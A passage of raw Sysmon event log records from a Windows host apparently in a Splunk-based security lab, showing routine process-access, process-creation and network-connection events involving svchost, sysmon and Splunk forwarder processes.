w64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000050418Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:57.869{85C0FFC9-EBF5-607E-ED06-00000000BB01}8043404C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050417Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:57.744{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EBF5-607E-ED06-00000000BB01}804C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050416Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:57.744{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050415Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:57.744{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050414Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:57.744{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050413Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:57.744{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050412Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:57.744{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050411Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:57.744{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050410Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:57.744{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050409Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:57.744{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050408Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:57.744{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050407Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:57.744{85C0FFC9-B7EC-607E-0500-00000000BB01}416532C:\Windows\system32\csrss.exe{85C0FFC9-EBF5-607E-ED06-00000000BB01}804C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000050406Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:57.744{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EBF5-607E-ED06-00000000BB01}804C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000050405Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:57.745{85C0FFC9-EBF5-607E-ED06-00000000BB01}804C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000050404Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:57.713{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BCB5A6BA7F911476B4D774B67D335A48,SHA256=3A743154D4151D7AD47DBE87EE6091CAEC666C6A4F06FB969E5DD72ED3BFD46D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000050403Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:57.213{85C0FFC9-EBF5-607E-EC06-00000000BB01}17281188C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000050402Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:54.597{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-53175-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 10341000x800000000000000050401Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:57.103{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EBF5-607E-EC06-00000000BB01}1728C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050400Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:57.103{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050399Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:57.103{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050398Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:57.103{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050397Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:57.103{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050396Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:57.103{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050395Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:57.103{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050394Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:57.103{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050393Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:57.103{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050392Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:57.103{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050391Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:57.103{85C0FFC9-B7EC-607E-0500-00000000BB01}4161008C:\Windows\system32\csrss.exe{85C0FFC9-EBF5-607E-EC06-00000000BB01}1728C:\Program 